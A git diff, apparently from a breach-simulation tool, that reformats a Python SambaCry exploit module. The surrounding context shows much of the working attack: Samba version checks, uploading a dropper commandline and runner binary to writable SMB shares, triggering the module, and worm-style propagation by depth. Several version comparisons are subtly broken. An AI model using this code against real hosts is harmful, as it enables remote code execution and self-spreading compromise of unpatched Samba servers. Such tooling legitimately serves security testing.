diff --git a/chaos_monkey/exploit/sambacry.py b/chaos_monkey/exploit/sambacry.py index 7bf8533ef..3b4477dcf 100644 --- a/chaos_monkey/exploit/sambacry.py +++ b/chaos_monkey/exploit/sambacry.py @@ -1,11 +1,10 @@ +import itertools import logging +import posixpath import re -import sys import time from io import BytesIO from os import path -import itertools -import posixpath import impacket.smbconnection from impacket.nt_errors import STATUS_SUCCESS @@ -37,7 +36,6 @@ class SambaCryExploiter(HostExploiter): def __init__(self): self._config = __import__('config').WormConfiguration - def exploit_host(self, host, depth=-1, src_path=None): if not self.is_vulnerable(host): return False @@ -66,7 +64,8 @@ class SambaCryExploiter(HostExploiter): host.services[SMB_SERVICE]["shares"][share]["fullpath"] = fullpath if len(successfully_triggered_shares) > 0: - LOG.info("Shares triggered successfully on host %s: %s" % (host.ip_addr, str(successfully_triggered_shares))) + LOG.info( + "Shares triggered successfully on host %s: %s" % (host.ip_addr, str(successfully_triggered_shares))) return True else: LOG.info("No shares triggered successfully on host %s" % host.ip_addr) @@ -86,7 +85,8 @@ class SambaCryExploiter(HostExploiter): self.trigger_module(smb_client, share) smb_client.close() except (impacket.smbconnection.SessionError, SessionError): - LOG.debug("Exception trying to exploit host: %s, share: %s, with creds: %s." % (host.ip_addr, share, str(creds))) + LOG.debug( + "Exception trying to exploit host: %s, share: %s, with creds: %s." % (host.ip_addr, share, str(creds))) def clean_share(self, ip, share, creds): """ @@ -198,11 +198,14 @@ class SambaCryExploiter(HostExploiter): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (samba_version_parts[1] <= "13"): + elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( + samba_version_parts[1] <= "13"): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (samba_version_parts[1] <= "9"): + elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( + samba_version_parts[1] <= "9"): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (samba_version_parts[1] <= "3"): + elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( + samba_version_parts[1] <= "3"): is_vulnerable = True LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" % @@ -244,7 +247,8 @@ class SambaCryExploiter(HostExploiter): """ tree_id = smb_client.connectTree(share) - with self.get_monkey_commandline_file(host, depth, self._config.dropper_target_path_linux) as monkey_commandline_file: + with self.get_monkey_commandline_file(host, depth, + self._config.dropper_target_path_linux) as monkey_commandline_file: smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read) with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file: @@ -326,14 +330,13 @@ class SambaCryExploiter(HostExploiter): else: return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb") - def get_monkey_commandline_file(self, host, depth, location): return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location)) # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability # def create_smb(self, smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, - fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, - oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None): + fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, + oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None): packet = smb_client.getSMBServer().SMB_PACKET() packet['Command'] = SMB2_CREATE @@ -407,5 +410,7 @@ class SambaCryExploiter(HostExploiter): return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: - return self.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, shareMode=FILE_SHARE_READ, - creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0) + return self.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, + shareMode=FILE_SHARE_READ, + creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, + fileAttributes=0)